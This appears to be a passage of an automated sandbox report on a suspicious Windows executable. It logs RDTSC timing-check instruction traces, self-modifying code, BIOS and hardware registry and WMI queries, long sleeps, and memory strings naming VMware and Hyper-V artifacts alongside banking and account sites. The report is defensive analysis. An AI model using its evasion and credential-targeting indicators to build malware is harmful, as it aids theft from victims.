                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480217 second address: 548023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF628B697A9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF628B69593h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548023A second address: 5480260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480260 second address: 5480264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480264 second address: 548026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548026A second address: 5480270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54802E6 second address: 54802EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54802EB second address: 548030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 6A9A0228h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF628B69593h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548030D second address: 5480313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480313 second address: 5480350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF628B69598h 0x00000014 add eax, 1EB216E8h 0x0000001a jmp 00007FF628B6958Bh 0x0000001f popfd 0x00000020 movzx ecx, di 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480350 second address: 5480356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480356 second address: 548035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548035A second address: 548035E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548039F second address: 54803A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803A5 second address: 54803A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803A9 second address: 54803C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FF698AD7661h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF628B6958Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803C3 second address: 54803D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803D5 second address: 54803D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803D9 second address: 54803F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF628D73FB7h 0x0000000e pushad 0x0000000f movzx ecx, dx 0x00000012 popad 0x00000013 cmp dword ptr [ebp-14h], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803F5 second address: 54803F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803F9 second address: 54803FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54803FF second address: 548042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF698AD760Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628B69590h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548042C second address: 5480432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480432 second address: 5480438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480438 second address: 548043C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548043C second address: 5480440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480440 second address: 54804AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007FF628D73F64h 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 pushad 0x00000014 call 00007FF628D73F5Eh 0x00000019 movzx eax, di 0x0000001c pop edi 0x0000001d popad 0x0000001e push ebp 0x0000001f jmp 00007FF628D73F66h 0x00000024 mov dword ptr [esp], esi 0x00000027 jmp 00007FF628D73F60h 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FF628D73F5Ah 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54804AF second address: 54804B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54804B3 second address: 54804B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54804B9 second address: 54804D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54804D2 second address: 54804D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54804D8 second address: 5480516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BEh 0x00000005 pushfd 0x00000006 jmp 00007FF628B6958Eh 0x0000000b adc cl, FFFFFFD8h 0x0000000e jmp 00007FF628B6958Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF628B69595h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480568 second address: 548057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, dh 0x0000000e mov eax, 3DB9AA35h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548057C second address: 5470D5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF628B69594h 0x00000012 adc ah, FFFFFFB8h 0x00000015 jmp 00007FF628B6958Bh 0x0000001a popfd 0x0000001b mov dl, ah 0x0000001d popad 0x0000001e je 00007FF698AD7626h 0x00000024 xor eax, eax 0x00000026 jmp 00007FF628B42CBAh 0x0000002b pop esi 0x0000002c pop edi 0x0000002d pop ebx 0x0000002e leave 0x0000002f retn 0004h 0x00000032 nop 0x00000033 xor ebx, ebx 0x00000035 cmp eax, 00000000h 0x00000038 je 00007FF628B696E3h 0x0000003e call 00007FF62DA3775Fh 0x00000043 mov edi, edi 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov al, F6h 0x0000004a mov bh, EFh 0x0000004c popad 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5470D5C second address: 5470D8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF628D73F5Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, BDE3h 0x00000017 mov edi, eax 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5470D8F second address: 5470DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 77CF7A36h 0x00000008 mov eax, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, EFh 0x00000013 pushfd 0x00000014 jmp 00007FF628B69597h 0x00000019 xor ch, 0000006Eh 0x0000001c jmp 00007FF628B69599h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5470DD8 second address: 5470EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF628D73F67h 0x00000009 and ch, 0000007Eh 0x0000000c jmp 00007FF628D73F69h 0x00000011 popfd 0x00000012 call 00007FF628D73F60h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push ebx 0x0000001f jmp 00007FF628D73F5Ah 0x00000024 pop eax 0x00000025 mov cx, bx 0x00000028 popad 0x00000029 push esi 0x0000002a jmp 00007FF628D73F5Ah 0x0000002f mov dword ptr [esp], ecx 0x00000032 jmp 00007FF628D73F60h 0x00000037 mov dword ptr [ebp-04h], 55534552h 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FF628D73F5Eh 0x00000045 adc ecx, 55EE0D38h 0x0000004b jmp 00007FF628D73F5Bh 0x00000050 popfd 0x00000051 push eax 0x00000052 push edx 0x00000053 pushfd 0x00000054 jmp 00007FF628D73F66h 0x00000059 sbb eax, 12388798h 0x0000005f jmp 00007FF628D73F5Bh 0x00000064 popfd 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548092E second address: 5480934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480934 second address: 5480938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480938 second address: 548093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548093C second address: 54809C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF628D73F5Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FF628D73F5Eh 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007FF628D73F5Eh 0x0000001c pushfd 0x0000001d jmp 00007FF628D73F62h 0x00000022 and al, 00000048h 0x00000025 jmp 00007FF628D73F5Bh 0x0000002a popfd 0x0000002b pop ecx 0x0000002c push edx 0x0000002d jmp 00007FF628D73F64h 0x00000032 pop eax 0x00000033 popad 0x00000034 cmp dword ptr [7544459Ch], 05h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF628D73F5Ch 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54809C1 second address: 5480A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF628B69591h 0x00000009 xor ecx, 5D46AEC6h 0x0000000f jmp 00007FF628B69591h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF628B69590h 0x0000001b sub ecx, 4A3B9F68h 0x00000021 jmp 00007FF628B6958Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a je 00007FF698AC7571h 0x00000030 jmp 00007FF628B69596h 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF628B69597h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480B7C second address: 5480B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480B8D second address: 5480BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF628B69593h 0x00000019 jmp 00007FF628B69593h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490974 second address: 5490978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490978 second address: 5490986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490986 second address: 549098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 549098A second address: 5490990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490990 second address: 54909D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF628D73F66h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628D73F67h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 54909D5 second address: 54909DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 54909DA second address: 5490A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF628D73F65h 0x0000000a or si, 4376h 0x0000000f jmp 00007FF628D73F61h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov si, di 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edx, ecx 0x00000024 mov edi, ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490A1D second address: 5490A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF628B69595h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490A4A second address: 5490AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FF628D73F63h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 jmp 00007FF628D73F5Fh 0x00000015 je 00007FF698CC1896h 0x0000001b pushad 0x0000001c mov si, F21Bh 0x00000020 movzx ecx, bx 0x00000023 popad 0x00000024 cmp dword ptr [7544459Ch], 05h 0x0000002b pushad 0x0000002c mov edi, 0EFFB6FCh 0x00000031 pushad 0x00000032 push ebx 0x00000033 pop esi 0x00000034 mov cx, bx 0x00000037 popad 0x00000038 popad 0x00000039 je 00007FF698CD9952h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov edi, eax 0x00000044 push ecx 0x00000045 pop edi 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490AA9 second address: 5490AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69593h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FF628B69596h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628B69597h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490C22 second address: 5490C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5490C26 second address: 5490C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Special instruction interceptor: First address: 5C7F6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Special instruction interceptor: First address: 7743C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Special instruction interceptor: First address: 7746FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Special instruction interceptor: First address: 78676E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe TID: 8004 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe TID: 7892 | Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Last function: Thread delayed
Source: Amcache.hve.5.dr | Binary or memory string: VMware
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: OtHVIQ2ge4.exe, OtHVIQ2ge4.exe, 00000000.00000003.1412566702.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572127165.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: OtHVIQ2ge4.exe, 00000000.00000003.1412566702.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572127165.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW]
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696497155p
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
